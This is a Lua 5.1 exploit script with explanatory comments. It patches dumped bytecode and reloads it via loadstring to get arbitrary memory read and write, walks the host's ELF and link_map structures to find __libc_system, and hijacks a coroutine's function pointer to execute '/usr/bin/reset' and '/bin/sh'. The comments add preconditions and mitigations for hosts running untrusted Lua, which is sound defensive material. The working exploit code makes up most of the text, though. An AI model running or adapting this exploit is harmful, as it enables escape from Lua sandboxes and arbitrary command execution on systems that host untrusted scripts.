  1. {
-- `asnum`: dumps the bytecode of a tiny numeric-for function, rewrites bytes
-- of that dump with the gsub below, and reloads the result with loadstring.
-- The reloaded chunk is one the compiler would never have produced; as it is
-- used further down, it hands back its argument reinterpreted as a number, so
-- a coroutine, string or function comes back as its address.  The only thing
-- that makes this possible is loadstring accepting an unverified binary chunk.
-- Preconditions (inferred from the byte patterns, not stated on the page):
-- a Lua 5.1-era bytecode format on a little-endian 64-bit build; elsewhere
-- the gsub either matches nothing or leaves a corrupt chunk.
-- Mitigation for hosts of untrusted Lua: refuse binary chunks (Lua 5.2+:
-- load(chunk, name, "t"); Lua 5.1: reject input whose first byte is "\27"
-- before it reaches loadstring) and keep string.dump out of the sandbox.
asnum = loadstring((string.dump(function(x)
    for i = x, x, 0 do
        return i
    end
end):gsub("\96%z%z\128", "\22\0\0\128")))
  7.  
  8. function double_to_dwords(x)
  9. if x == 0 then return 0, 0 end
  10. if x < 0 then x = -x end
  11.  
  12. local m, e = math.frexp(x)
  13.  
  14. if e + 1023 <= 1 then
  15. m = m * 2^(e + 1074)
  16. e = 0
  17. else
  18. m = (m - 0.5) * 2^53
  19. e = e + 1022
  20. end
  21.  
  22. local lo = m % 2^32
  23. m = (m - lo) / 2^32
  24. local hi = m + e * 2^20
  25.  
  26. return lo, hi
  27. end
  28.  
  29. function dwords_to_double(lo, hi)
  30. local m = hi % 2^20
  31. local e = (hi - m) / 2^20
  32. m = m * 2^32 + lo
  33.  
  34. if e ~= 0 then
  35. m = m + 2^52
  36. else
  37. e = 1
  38. end
  39. return m * 2^(e-1075)
  40. end
  41.  
  42. function dword_to_string(x)
  43. local b0 = x % 256; x = (x - b0) / 256
  44. local b1 = x % 256; x = (x - b1) / 256
  45. local b2 = x % 256; x = (x - b2) / 256
  46. local b3 = x % 256
  47.  
  48. return string.char(b0, b1, b2, b3)
  49. end
  50.  
  51. function qword_to_string(x)
  52. local lo, hi = double_to_dwords(x)
  53. return dword_to_string(lo) .. dword_to_string(hi)
  54. end
  55.  
  56. function add_dword_to_double(x, n)
  57. local lo, hi = double_to_dwords(x)
  58. return dwords_to_double(lo + n, hi)
  59. end
  60.  
  61. rawset(_G, "add_dword_to_double", add_dword_to_double)
  62. rawset(_G, "asnum", asnum)
  63. rawset(_G, "double_to_dwords", double_to_dwords)
  64. rawset(_G, "dwords_to_double", dwords_to_double)
  65. rawset(_G, "dword_to_string", dword_to_string)
  66. rawset(_G, "qword_to_string", qword_to_string)
  67.  
  68. -- stop garbage collecting
  69. collectgarbage "stop"
  70.  
-- `f`: the bytecode of the closure below is dumped, patched by the gsub at
-- the very end, and reloaded, so the VM executes a chunk the compiler never
-- produced.  As the code uses it, `put_into_magic(addr)` followed by a read
-- of `asnum(magic)` reads memory at addr, and an assignment to `magic` after
-- `put_into_magic(addr)` writes there -- an arbitrary read/write inside the
-- interpreter's own process.  With that the code walks the host ELF's
-- program headers and dynamic section, follows link_map to libc, resolves
-- __libc_system by name, installs it as the C function behind the `co`
-- wrapper and finally calls `co()` with the strings held in `commands`.
--
-- Preconditions (inferred from the constants, not stated on the page): a
-- Lua 5.1-era interpreter whose loadstring accepts unverified binary chunks,
-- a 64-bit little-endian Linux ELF host, and a build-specific distance
-- `pht_offset_from_auxwrap` between luaB_auxwrap and the ELF header; a
-- different binary makes that constant wrong.
--
-- Mitigations for anyone hosting untrusted Lua: refuse binary chunks
-- (Lua 5.2+: load(chunk, name, "t"); Lua 5.1: reject input whose first
-- byte is "\27" before loadstring), remove string.dump from the sandbox,
-- and treat string.dump/loadstring/rawset applied to arbitrary data as a
-- detection signal.  Metatable-based sandboxing of _G does not help once a
-- patched chunk has been loaded.
f = loadstring(string.dump(function()
    local magic = nil
    local function middle()
        local print = print -- captured but never used
        local asnum = asnum
        local double_to_dwords = double_to_dwords
        local add_dword_to_double = add_dword_to_double
        local dwords_to_double = dwords_to_double
        local qword_to_string = qword_to_string
        local co = coroutine.wrap(function() end)
        local substr = string.sub
        local find = string.find
        local upval

        -- get the address of current "lua_State"
        local luastate1 = asnum(coroutine.running())
        local luastate2 = add_dword_to_double(luastate1, 8)

        -- some constants
        local n1 = 1
        local n2 = 2
        local n4 = 4
        local n6 = 6
        local n7 = 7
        local n8 = 8
        local n16 = 16
        local n24 = 24
        local n32 = 32

        local pht_offset_from_auxwrap = 0x8ba060 -- build-specific; see header comment
        local h38 = 0x38 -- program header entry size

        -- ELF p_type / d_tag values (DT_STRRAB is a misspelling of DT_STRTAB;
        -- the value 5 is correct and the name is only local)
        local PT_DYNAMIC = 2
        local DT_NULL = 0
        local DT_STRRAB = 5
        local DT_SYMTAB = 6
        local DT_DEBUG = 21

        local libc = "libc.so."
        local system = "__libc_system"
        local null = "\0"
        local empty = ""

        -- declare some variables
        local luastate1_bkp
        local luastate2_bkp

        local lo, hi
        local base
        local ptheader
        local dynamic
        local symbol -- declared but never used

        local libc_base
        local libc_system
        local libc_strtab
        local libc_symtab
        local debug

        local s, e, tmp, n
        local str = empty
        local link_map
        local libc_dynamic

        -- each pair of doubles is 16 bytes of a NUL-terminated command string
        local commands = {
            dwords_to_double(0x7273752f, 0x6e69622f), dwords_to_double(0x7365722f, 0x00007465), -- "/usr/bin/reset"
            dwords_to_double(0x6e69622f, 0x0068732f), dwords_to_double(0x00000000, 0x00000000) } -- "/bin/sh"

        local function put_into_magic(n)
            -- hand-craft an UpVal
            upval = "nextnexttmpaddpa" .. qword_to_string(n)

            -- get the pointer to our hand-crafted UpVal
            local upval_ptr = qword_to_string(add_dword_to_double(asnum(upval), 24))

            magic = upval_ptr .. upval_ptr .. upval_ptr
        end

        -- put luaB_auxwrap's address into "magic"
        put_into_magic(add_dword_to_double(asnum(co), n32))

        -- get offset to Program Header Table (ELF Header + 32)
        lo, hi = double_to_dwords(asnum(magic))
        base = dwords_to_double(lo - pht_offset_from_auxwrap, hi)
        put_into_magic(add_dword_to_double(base, n32))

        -- get real address of Program Header Table
        lo, hi = double_to_dwords(asnum(magic))
        ptheader = add_dword_to_double(base, lo)

        -- get the _DYNAMIC section's address
        -- (no bound on the number of entries: a binary without PT_DYNAMIC
        -- would make this loop read past the table)
        while true do
            put_into_magic(ptheader)
            lo, hi = double_to_dwords(asnum(magic))
            if lo == PT_DYNAMIC then
                -- p_vaddr : elf64_phdr+16
                put_into_magic(add_dword_to_double(ptheader, n16))
                dynamic = asnum(magic)
                break
            else
                ptheader = add_dword_to_double(ptheader, h38)
            end
        end

        dynamic = dynamic + base

        -- get DT_DEBUG (same unbounded-loop caveat as above)
        while true do
            put_into_magic(dynamic)
            lo, hi = double_to_dwords(asnum(magic))

            if lo == DT_DEBUG then
                put_into_magic(add_dword_to_double(dynamic, n8))
                debug = asnum(magic)
                break
            else
                dynamic = add_dword_to_double(dynamic, n16)
            end
        end

        -- get the pointer to the link_map structure
        put_into_magic(add_dword_to_double(debug, n8))
        link_map = asnum(magic)

        -- iterate link_map until libc is found
        while true do

            put_into_magic(add_dword_to_double(link_map, n8))
            n = asnum(magic)

            -- we can read only 8 bytes at once, so we have to loop
            while true do
                put_into_magic(n)
                tmp = qword_to_string(asnum(magic))

                s, e = find(tmp, null)
                if s then
                    str = str .. substr(tmp, n1, s - n1)
                    break
                else
                    str = str .. tmp
                    n = add_dword_to_double(n, n8)
                end
            end

            -- have we found libc?  (str is never reset in this loop, so the
            -- names of all entries seen so far are concatenated; the match
            -- still works because "libc.so." appears once libc is reached)
            s, e = find(str, libc)
            if s then
                put_into_magic(link_map)
                libc_base = asnum(magic)

                -- get _DYNAMIC section for LibC
                put_into_magic(add_dword_to_double(link_map, n16))
                libc_dynamic = asnum(magic)

                -- get DT_STRTAB and DT_SYMTAB from LibC
                while true do
                    put_into_magic(libc_dynamic)
                    lo, hi = double_to_dwords(asnum(magic))
                    put_into_magic(add_dword_to_double(libc_dynamic, n8))

                    if lo == DT_NULL then
                        break
                    elseif lo == DT_STRRAB then
                        libc_strtab = asnum(magic)
                    elseif lo == DT_SYMTAB then
                        libc_symtab = asnum(magic)
                    end

                    libc_dynamic = add_dword_to_double(libc_dynamic, n16)
                end

                break
            else
                put_into_magic(add_dword_to_double(link_map, n24))
                link_map = asnum(magic)
            end
        end

        -- iterate LibC's symbol table until system (actually __libc_system) is
        -- found.
        while true do
            put_into_magic(libc_symtab)
            lo, hi = double_to_dwords(asnum(magic))

            -- we can read only 8 bytes at once, so we have to loop
            n = add_dword_to_double(libc_strtab, lo)
            str = empty
            while true do
                put_into_magic(n)
                tmp = qword_to_string(asnum(magic))

                s, e = find(tmp, null)
                if s then
                    str = str .. substr(tmp, n1, s - n1)
                    break
                else
                    str = str .. tmp
                    n = add_dword_to_double(n, n8)
                end
            end

            if str and str == system then
                -- get __libc_system's real address
                put_into_magic(add_dword_to_double(libc_symtab, n8))
                lo, hi = double_to_dwords(asnum(magic))
                libc_system = add_dword_to_double(libc_base, lo)
                break
            else
                libc_symtab = add_dword_to_double(libc_symtab, n24)
            end
        end

        -- replace co's function pointer to __libc_system's real address
        put_into_magic(add_dword_to_double(asnum(co), n32))
        magic = libc_system

        -- save the current lua_State
        put_into_magic(luastate1)
        luastate1_bkp = asnum(magic)
        put_into_magic(luastate2)
        luastate2_bkp = asnum(magic)

        -- execute commands in 16 byte chunks
        for i=n1,#commands,n2 do
            put_into_magic(luastate1)
            magic = commands[i]
            put_into_magic(luastate2)
            magic = commands[i + n1]
            co()
        end

        -- restore the original lua_State
        put_into_magic(luastate1)
        magic = luastate1_bkp
        put_into_magic(luastate2)
        magic = luastate2_bkp

    end
    middle()
end):gsub("(\100%z%z%z)....", "%1\0\0\0\1", 1))
-- run inside a coroutine, presumably because coroutine.running() (used
-- above) returns nil on the main thread in Lua 5.1
coroutine.wrap(f)()
  313. }